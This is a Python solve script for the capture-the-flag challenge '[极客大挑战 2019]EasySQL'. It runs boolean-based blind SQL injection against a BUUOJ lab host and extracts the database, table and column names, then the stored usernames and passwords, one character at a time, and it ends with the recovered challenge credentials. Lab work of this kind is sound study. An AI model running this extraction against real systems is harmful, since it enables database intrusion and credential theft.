
[极客大挑战 2019]EasySQL

from requests import get #用于向服务器发送请求
from urllib.parse import quote,unquote
from time import sleep
# Candidate character set tried at every position during extraction.
# Note: this shadows the builtin ascii(); the file never uses the builtin.
# ',' is included because 字段内容username/字段内容password use it as their
# stop marker (see the `if ',' in STR` checks there).
ascii='1234567890qwertyuioplkjhgfdsazxcvbnm-_,'

def 当前数据库名称长度() -> int | None: 
    """Probe the length of the current database name via a boolean oracle.

    Each candidate length ``i`` in ``0..49`` is injected through the
    ``username`` query parameter of the lab's ``check.php``; a response body
    containing ``'flag'`` is treated as "condition true".

    Returns:
        The first matching ``i``, or ``None`` when no candidate in the range
        matched (the loop simply falls through).

    Defensive note: the whole oracle exists only because the server
    concatenates ``username`` into its SQL text. A bound parameter (prepared
    statement) removes it; on the monitoring side, a burst of near-identical
    ``username`` values carrying SQL keywords is the detection handle.
    """
    for i in range(50):
        # Boolean-based blind probe: the OR clause is true only when the
        # candidate length equals length(database()).
        payload=f"1' or (select length(database()))={i} -- +"
        payload=quote(payload)
        # Lab instance host copied from the author's session (node5.buuoj.cn);
        # later functions in this file use a different instance id.
        url=f'http://b46aa40b-04dc-452e-a0a7-ec3a0cb084b7.node5.buuoj.cn:81/check.php?username={payload}&password=1'
        res=get(url).text
        # Oracle check: 'flag' appears in the page only on a true condition.
        if 'flag' in res:
            #print(unquote(payload))   1' or (select length(database()))=4 -- +
            return i 
def 当前数据库名称() -> str:
    """Recover the current database name one character at a time.

    Calls 当前数据库名称长度() first (which issues its own sweep of requests),
    then for every position ``ix`` from ``0`` up to and including that length
    tries each character of the module-level ``ascii`` alphabet until the
    oracle (``'flag'`` in the response body) confirms one.

    Returns:
        The accumulated string; positions where no alphabet character
        matched are silently skipped. If 当前数据库名称长度() returns ``None``
        the ``+1`` raises ``TypeError``.
    """
    STR=''
    # ix runs from 0 to the reported length inclusive.
    for ix in range(当前数据库名称长度()+1):
        for i in ascii:
            # substr(database(), ix, 1) is compared against the candidate char.
            payload=f"1' or (select substr(database(),{ix},1))='{i}' -- +"
            payload=quote(payload)
            url=f'http://b46aa40b-04dc-452e-a0a7-ec3a0cb084b7.node5.buuoj.cn:81/check.php?username={payload}&password=1'
            res=get(url).text
            if 'flag' in res:
                STR+=i
                # First confirmed character wins; move to the next position.
                break
    return STR #geek
def 所有表名称的长度() -> int | None:
    """Probe the total length of all table names in schema ``geek``.

    The schema name is hard-coded from the result of 当前数据库名称() (see
    the ``#geek`` note there). Candidate lengths ``0..49`` are tested against
    ``length(group_concat(table_name))`` using the same ``'flag'`` oracle.

    Returns:
        The first matching length, or ``None`` if none matched.
    """
    for i in range(50):
        payload=f"1' or (select length(group_concat(table_name)) from information_schema.tables where table_schema='geek')={i} -- +"
        payload=quote(payload)
        url=f'http://b46aa40b-04dc-452e-a0a7-ec3a0cb084b7.node5.buuoj.cn:81/check.php?username={payload}&password=1'
        res=get(url).text
        if 'flag' in res:
            # The commented payload below predates the group_concat() version
            # of the live query above; it is kept as the author's record.
            #print(unquote(payload))   #1' or (select length(table_name) from information_schema.tables where table_schema='geek')=8 -- +
            return i 
def 所有表名称() -> str:
    """Recover the table name in schema ``geek`` character by character.

    Positions ``1..8`` are hard-coded (the ``=8`` in the note inside
    所有表名称的长度 is presumably where that bound came from). For each
    position every character of ``ascii`` is tried until the oracle confirms.

    Returns:
        The accumulated string (``geekuser`` per the author's note);
        unmatched positions are skipped without error.
    """
    STR=''
    for ix in range(1,9):
        for i in ascii:
            payload=f"1' or (select substr(table_name,{ix},1) from information_schema.tables where table_schema='geek')='{i}' -- +"
            payload=quote(payload)
            url=f'http://b46aa40b-04dc-452e-a0a7-ec3a0cb084b7.node5.buuoj.cn:81/check.php?username={payload}&password=1'
            res=get(url).text
            if 'flag' in res:
                STR+=i
                break 
    return STR #geekuser
def 所有字段名长度() -> int | None:
    """Probe the total length of the column-name list for ``geek.geekuser``.

    Schema and table names are hard-coded from earlier results. Candidate
    lengths ``0..49`` are tested against ``length(group_concat(column_name))``
    with the ``'flag'`` oracle.

    Returns:
        The first matching length, or ``None`` if none matched.
    """
    for i in range(50):
        payload=f"1' or (select length(group_concat(column_name)) from information_schema.columns where table_schema='geek' and table_name='geekuser')={i} -- +"
        payload=quote(payload)
        url=f'http://b46aa40b-04dc-452e-a0a7-ec3a0cb084b7.node5.buuoj.cn:81/check.php?username={payload}&password=1'
        res=get(url).text
        if 'flag' in res:
            # Stale copy of the note from 所有表名称的长度 (it still refers to
            # table_name); it does not describe the query above.
            #print(unquote(payload))   #1' or (select length(table_name) from information_schema.tables where table_schema='geek')=8 -- +
            return i 
def 所有字段() -> str: #id,usernam,swd
    """Recover the comma-joined column list of ``geek.geekuser``.

    Positions ``0..20`` are hard-coded (presumably the length reported by
    所有字段名长度 plus one — not verified here). Each probe is followed by a
    0.1 s pause. Note this function targets a different lab instance id
    (``e34d9132-...``) than the functions above.

    Returns:
        The accumulated string; the author's inline note records the
        recovered value as ``id,usernam,swd``.
    """
    STR=''
    for ix in range(21):
        for i in ascii:
            payload=f"1' or (select substr(group_concat(column_name),{ix},1) from information_schema.columns where table_schema='geek' and table_name='geekuser')='{i}' -- +"
            payload=quote(payload)
            url=f'http://e34d9132-5680-4609-bf86-fd41f80acd0e.node5.buuoj.cn:81/check.php?username={payload}&password=1'
            res=get(url).text
            # Throttle between probes.
            sleep(0.1)
            if 'flag' in res:
                #print(unquote(payload))
                STR+=i
                break 
    return STR
def 字段内容长度() -> int | None:
    """Probe the length of ``group_concat(username,password)`` in ``geekuser``.

    Candidate lengths ``0..999`` are tried. Every probe's decoded payload is
    printed before the oracle check, so this function is very noisy on
    stdout. It is defined but not called anywhere in this file.

    Returns:
        The first matching length, or ``None`` if none matched.
    """
    for i in range(1000):
        # Note the trailing ``limit 0,1`` placed after the comparison.
        payload=f"1' or (select length(group_concat(username,password)) from geekuser)={i} limit 0,1-- +"
        payload=quote(payload)
        url=f'http://e34d9132-5680-4609-bf86-fd41f80acd0e.node5.buuoj.cn:81/check.php?username={payload}&password=1'
        res=get(url).text
        # Unconditional trace of every probe (not only the matching one).
        print(unquote(payload))
        if 'flag' in res:
            # Stale copy of the note from 所有表名称的长度; it does not describe
            # the query above.
            #print(unquote(payload))   #1' or (select length(table_name) from information_schema.tables where table_schema='geek')=8 -- +
            return i 
def 字段内容username() -> str | None:
    """Recover ``group_concat(username)`` from ``geekuser`` up to the first comma.

    Positions ``0..147`` are hard-coded. For each position the ``ascii``
    alphabet is tried with a 0.1 s pause per probe; a confirmed character is
    printed (decoded payload) and appended.

    Stop condition: ``','`` (part of the alphabet) is treated as the
    group_concat separator. The check sits after the match branch, so it
    fires on the next non-matching probe rather than immediately after the
    comma is appended.

    Returns:
        The accumulated string including the trailing comma, or ``None`` if
        no comma was found within the 148 positions (loop falls through).
    """
    STR=''
    for ix in range(148):
        for i in ascii:
            payload=f"1' or (select substr(group_concat(username),{ix},1) from geekuser)='{i}' -- +"
            payload=quote(payload)
            url=f'http://e34d9132-5680-4609-bf86-fd41f80acd0e.node5.buuoj.cn:81/check.php?username={payload}&password=1'
            res=get(url).text
            sleep(0.1)
            if 'flag' in res:
                print(unquote(payload))
                STR+=i
                break 
            # Reached only on a non-matching probe; returns once a comma
            # has been appended by an earlier iteration.
            if ',' in STR:
                return STR
def 字段内容password() -> str | None:
    """Recover ``group_concat(password)`` from ``geekuser`` up to the first comma.

    Mirrors 字段内容username with the column swapped: positions ``0..147``,
    the ``ascii`` alphabet per position, a 0.1 s pause per probe, and the
    decoded payload printed for each confirmed character.

    Stop condition: ``','`` in the accumulated string, checked after the
    match branch, so the return happens on the following non-matching probe.

    Returns:
        The accumulated string including the trailing comma, or ``None`` if
        no comma was found within the 148 positions.
    """
    STR=''
    for ix in range(148):
        for i in ascii:
            payload=f"1' or (select substr(group_concat(password),{ix},1) from geekuser)='{i}' -- +"
            payload=quote(payload)
            url=f'http://e34d9132-5680-4609-bf86-fd41f80acd0e.node5.buuoj.cn:81/check.php?username={payload}&password=1'
            res=get(url).text
            sleep(0.1)
            if 'flag' in res:
                print(unquote(payload))
                STR+=i
                break 
            # Reached only on a non-matching probe; returns once a comma
            # has been appended by an earlier iteration.
            if ',' in STR:
                return STR
# Script entry: only the two row-content extractors are run; the earlier
# enumeration functions are left defined but unused here. Both calls issue
# many requests to the lab instance and print as they go.
print(字段内容username())
print(字段内容password())
# Author's recorded result for this lab instance:
# account: in_fact
# password: this_question_is_very_simple
